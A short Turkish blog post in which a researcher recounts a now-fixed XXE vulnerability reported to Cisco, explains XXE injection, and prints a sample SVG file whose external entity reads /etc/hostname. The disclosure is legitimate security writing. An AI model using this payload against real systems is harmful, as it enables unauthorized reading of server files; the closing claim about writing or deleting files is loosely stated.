|

Cisco'da Bulduğum Zafiyet



alicangonullu tarafından 2023-03-14 15:04:36 tarihinde yazıldı. Tahmini okunma süresi 1 dakika, 12 saniye. 78 kere görüntülendi.




Disclaimer


The information provided in this blog post is intended for educational and informational purposes only. It is not intended to encourage or promote any illegal or unethical activities, including hacking, cyberattacks, or any form of unauthorized access to computer systems, networks, or data.

Yasal Uyarı
Bu blog yazısında sağlanan bilgiler yalnızca eğitim ve bilgilendirme amaçlıdır. Bilgisayar korsanlığı, siber saldırılar veya bilgisayar sistemlerine, ağlara veya verilere herhangi bir şekilde yetkisiz erişim de dahil olmak üzere herhangi bir yasa dışı veya etik olmayan faaliyeti teşvik etme veya reklamlama amacı taşımaz.
Yasal bilgiler için yasal sayfasını inceleyebilirsiniz .

Merhabalar,

Bu yazımda sizlere yaklaşık üç ay önce bulduğum ve 20 Şubat itibarıyla çözülen Cisco zafiyetinden bahsedeceğim. Bu zafiyet ile birlikte Cisco'ya ait olan Hall of Fame listesine girmeye hak kazandım.

Öncelikle bahsetmemiz gereken şey XXE Enjeksiyonu konusu olacaktır.

XXE Enjeksiyonu

XXE Enjeksiyonu kısaca, sisteme XML, SVG ve benzeri bir formatla yüklenen dosyalar üzerinden komut ve/veya kod enjeksiyonu yapabileceğiniz bir zafiyet çeşididir. Cisco'da bulduğum zafiyette bunun bir benzerini içermektedir.

Zafiyetin Uygulanması

Güvenlik amacıyla sadece SVG dosyasının bir benzerini vereceğim,

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg> 

Örnek ekran görüntüsü

Bu aşamada sadece bir JavaScript kodunu içeriye aktardım fakat dosya sistemini bildiğiniz takdirde içeriye dosya okuma, yazma ve/veya silme komutları da gönderebilirsiniz.